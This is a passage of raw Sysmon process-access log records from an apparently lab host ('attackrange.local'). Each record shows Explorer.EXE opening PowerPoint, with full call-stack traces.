Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56efa|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081759Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081758Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081757Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56f8f|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081756Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56efa|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081755Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081754Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081753Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56f8f|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081752Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56efa|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081751Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081750Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081749Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56f8f|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081748Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56efa|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081747Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081746Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081745Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56f8f|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081744Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56efa|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081743Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081742Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081741Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56f8f|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081740Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56efa|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081739Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081738Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081737Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56f8f|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081736Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56efa|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081735Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081734Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081733Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft 